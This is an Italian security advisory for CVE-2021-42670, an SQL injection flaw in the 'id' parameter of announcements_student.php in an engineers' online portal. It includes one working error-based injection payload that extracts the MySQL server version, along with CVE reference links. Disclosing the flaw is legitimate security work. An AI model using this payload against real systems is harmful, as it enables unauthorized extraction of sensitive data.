
CVE-2021-42670 - Vulnerabilità SQL Injection nel sistema del portale online degli ingegneri.
CVE-2021-42670 - Vulnerabilità SQL Injection nel sistema del portale online degli ingegneri.
Esiste una vulnerabilità SQL Injection nel portale online degli ingegneri. Un attaccante può sfruttare il vulnerabile parametro "id" nella pagina web "announcements_student.php" per manipolare la query SQL eseguita. Di conseguenza, l'attaccante può estrarre dati sensibili dal server web.
Componenti interessati -
Pagina vulnerabile - announcements_student.php
Parametro vulnerabile - "id"
Il seguente payload permetterà di estrarre la versione del server MySql in esecuzione sul server web -
1' AND (SELECT 4356 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,51)),0x7178786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMLo'='pMLo

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42670
https://nvd.nist.gov/vuln/detail/CVE-2021-42670
Alon Leviev(0xDeku), 22 Ottobre 2021.